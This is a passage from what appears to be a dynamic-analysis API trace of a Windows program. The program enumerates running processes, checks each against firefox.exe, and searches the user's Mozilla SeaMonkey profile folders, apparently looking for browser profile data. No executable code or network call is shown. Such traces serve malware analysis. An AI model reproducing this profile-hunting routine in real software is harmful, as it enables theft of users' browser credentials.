Services\\advocate-keep.exe" | out: _Dest="C:\\Program Files\\Microsoft Analysis Services\\advocate-keep.exe") returned="C:\\Program Files\\Microsoft Analysis Services\\advocate-keep.exe" [0087.737] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.737] CloseHandle (hObject=0x10c) returned 1 [0087.737] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="distributors.exe")) returned 1 [0087.737] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c8) returned 0x10c [0087.737] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\distributors.exe" (normalized: "c:\\program files\\microsoft office\\distributors.exe")) returned 0x32 [0087.737] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft Office\\distributors.exe" | out: _Dest="C:\\Program Files\\Microsoft Office\\distributors.exe") returned="C:\\Program Files\\Microsoft Office\\distributors.exe" [0087.737] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.738] CloseHandle (hObject=0x10c) returned 1 [0087.738] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighter.exe")) returned 1 [0087.738] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d8) returned 0x10c [0087.738] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft.NET\\lighter.exe" (normalized: "c:\\program files\\microsoft.net\\lighter.exe")) returned 0x2a [0087.738] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft.NET\\lighter.exe" | out: _Dest="C:\\Program Files\\Microsoft.NET\\lighter.exe") returned="C:\\Program Files\\Microsoft.NET\\lighter.exe" [0087.738] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.738] CloseHandle (hObject=0x10c) returned 1 [0087.738] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lease-entitled-pcs.exe")) returned 1 [0087.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e8) returned 0x10c [0087.739] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\lease-entitled-pcs.exe" (normalized: "c:\\program files\\windows sidebar\\lease-entitled-pcs.exe")) returned 0x37 [0087.739] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows Sidebar\\lease-entitled-pcs.exe" | out: _Dest="C:\\Program Files\\Windows Sidebar\\lease-entitled-pcs.exe") returned="C:\\Program Files\\Windows Sidebar\\lease-entitled-pcs.exe" [0087.739] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.739] CloseHandle (hObject=0x10c) returned 1 [0087.739] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="nerve-bracelet.exe")) returned 1 [0087.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f8) returned 0x10c [0087.740] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Media Player\\nerve-bracelet.exe" (normalized: "c:\\program files\\windows media player\\nerve-bracelet.exe")) returned 0x38 [0087.740] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows Media Player\\nerve-bracelet.exe" | out: _Dest="C:\\Program Files\\Windows Media Player\\nerve-bracelet.exe") returned="C:\\Program Files\\Windows Media Player\\nerve-bracelet.exe" [0087.740] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.740] CloseHandle (hObject=0x10c) returned 1 [0087.740] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0087.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x10c [0087.741] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office15\\winword.exe")) returned 0x36 [0087.741] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" | out: _Dest="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE") returned="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" [0087.741] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.741] CloseHandle (hObject=0x10c) returned 1 [0087.741] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0087.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x0 [0087.742] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xc04, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 1 [0087.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc18) returned 0x10c [0087.743] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0087.743] wcscpy (in: _Dest=0x28b730, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" [0087.743] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.743] CloseHandle (hObject=0x10c) returned 1 [0087.743] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc18, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 1 [0087.743] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc50) returned 0x10c [0087.743] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0087.744] wcscpy (in: _Dest=0x28b730, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" [0087.744] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.744] CloseHandle (hObject=0x10c) returned 1 [0087.744] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc18, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 1 [0087.744] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc64) returned 0x10c [0087.744] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0087.744] wcscpy (in: _Dest=0x28b730, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" [0087.745] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.745] CloseHandle (hObject=0x10c) returned 1 [0087.745] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc18, pcPriClassBase=8, dwFlags=0x0, szExeFile="serverhost.exe")) returned 0 [0087.745] CloseHandle (hObject=0xe8) returned 1 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.745] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="C:\\Windows\\system32\\taskhost.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="taskhost.exe", _String2="firefox.exe") returned 14 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="C:\\Windows\\system32\\Dwm.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="Dwm.exe", _String2="firefox.exe") returned -2 [0087.746] _wcsicmp (_String1="C:\\Windows\\Explorer.EXE", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="Explorer.EXE", _String2="firefox.exe") returned -1 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="C:\\Windows\\system32\\taskeng.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="taskeng.exe", _String2="firefox.exe") returned 14 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.746] _wcsicmp (_String1="C:\\Program Files\\Common Files\\blowiranlaboratorydisaster.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="blowiranlaboratorydisaster.exe", _String2="firefox.exe") returned -4 [0087.746] _wcsicmp (_String1="C:\\Program Files\\Internet Explorer\\argentina conducting merchandise.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="argentina conducting merchandise.exe", _String2="firefox.exe") returned -5 [0087.746] _wcsicmp (_String1="C:\\Program Files\\Microsoft Analysis Services\\output.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="output.exe", _String2="firefox.exe") returned 9 [0087.746] _wcsicmp (_String1="C:\\Program Files\\Adobe\\bookings.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="bookings.exe", _String2="firefox.exe") returned -4 [0087.746] _wcsicmp (_String1="C:\\Program Files\\DVD Maker\\lyrics-morning-effectiveness.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="lyrics-morning-effectiveness.exe", _String2="firefox.exe") returned 6 [0087.746] _wcsicmp (_String1="C:\\Program Files\\Windows Defender\\involved-int-antenna-lol.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="involved-int-antenna-lol.exe", _String2="firefox.exe") returned 3 [0087.746] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office\\enterprise monsters comments.exe", _String2="firefox.exe") returned -3 [0087.746] _wcsicmp (_String1="enterprise monsters comments.exe", _String2="firefox.exe") returned -1 [0087.746] _wcsicmp (_String1="C:\\Program Files\\DVD Maker\\food_logos_lot.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="food_logos_lot.exe", _String2="firefox.exe") returned 6 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Windows Sidebar\\designed.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="designed.exe", _String2="firefox.exe") returned -2 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office\\chargetrackbacksobserve.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="chargetrackbacksobserve.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="C:\\Program Files\\MSBuild\\info-began-nobody-tops.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="info-began-nobody-tops.exe", _String2="firefox.exe") returned 3 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Uninstall Information\\myers biggest qatar.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="myers biggest qatar.exe", _String2="firefox.exe") returned 7 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Google\\invalid.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="invalid.exe", _String2="firefox.exe") returned 3 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Windows NT\\panel-maria-suggestion.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="panel-maria-suggestion.exe", _String2="firefox.exe") returned 10 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Windows Mail\\remained universe sole.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="remained universe sole.exe", _String2="firefox.exe") returned 12 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Internet Explorer\\evanescence oscar em.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="evanescence oscar em.exe", _String2="firefox.exe") returned -1 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Reference Assemblies\\fifth roller.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="fifth roller.exe", _String2="firefox.exe") returned -12 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Windows Sidebar\\irish.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="irish.exe", _String2="firefox.exe") returned 3 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Microsoft Analysis Services\\advocate-keep.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="advocate-keep.exe", _String2="firefox.exe") returned -5 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office\\distributors.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="distributors.exe", _String2="firefox.exe") returned -2 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Microsoft.NET\\lighter.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="lighter.exe", _String2="firefox.exe") returned 6 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Windows Sidebar\\lease-entitled-pcs.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="lease-entitled-pcs.exe", _String2="firefox.exe") returned 6 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Windows Media Player\\nerve-bracelet.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="nerve-bracelet.exe", _String2="firefox.exe") returned 8 [0087.747] _wcsicmp (_String1="C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="WINWORD.EXE", _String2="firefox.exe") returned 17 [0087.747] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.747] _wcsicmp (_String1="", _String2="firefox.exe") returned -102 [0087.747] _wcsicmp (_String1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="serverhost.exe", _String2="firefox.exe") returned 13 [0087.747] _wcsicmp (_String1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="serverhost.exe", _String2="firefox.exe") returned 13 [0087.747] _wcsicmp (_String1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", _String2="firefox.exe") returned -3 [0087.747] _wcsicmp (_String1="serverhost.exe", _String2="firefox.exe") returned 13 [0087.747] FreeLibrary (hLibModule=0x773f0000) returned 1 [0087.748] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28b738, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 1 [0087.748] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28aef8, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 1 [0087.748] wcslen (_String="Mozilla\\SeaMonkey\\Profiles") returned 0x1a [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0087.748] wcscpy (in: _Dest=0x28b528, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0087.748] wcscat (in: _Dest=0x28b528, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0087.748] wcscat (in: _Dest=0x28b528, _Source="Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" [0087.748] wcslen (_String="Mozilla\\SeaMonkey\\Profiles") returned 0x1a [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0087.748] wcscpy (in: _Dest=0x28b318, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0087.748] wcscat (in: _Dest=0x28b318, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0087.748] wcscat (in: _Dest=0x28b318, _Source="Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" [0087.748] wcslen (_String="Mozilla\\SeaMonkey") returned 0x11 [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0087.748] wcscpy (in: _Dest=0x28b108, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming") returned 0x28 [0087.748] wcscat (in: _Dest=0x28b108, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\" [0087.748] wcscat (in: _Dest=0x28b108, _Source="Mozilla\\SeaMonkey" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x43 [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x43 [0087.748] wcslen (_String="*.*") returned 0x3 [0087.748] wcscpy (in: _Dest=0x28a2dc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles") returned 0x43 [0087.748] wcscat (in: _Dest=0x28a2dc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\" [0087.748] wcscat (in: _Dest=0x28a2dc, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*" [0087.748] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Mozilla\\SeaMonkey\\Profiles\\*.*", lpFindFileData=0x28a564 | out: lpFindFileData=0x28a564) returned 0xffffffff [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x41 [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x41 [0087.748] wcslen (_String="*.*") returned 0x3 [0087.748] wcscpy (in: _Dest=0x28a2dc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles" [0087.748] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles") returned 0x41 [0087.748] wcscat (in: _Dest=0x28a2dc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Mozilla\\SeaMonkey\\Profiles\\") returned="C:\\Users\\BGC6u8Oy 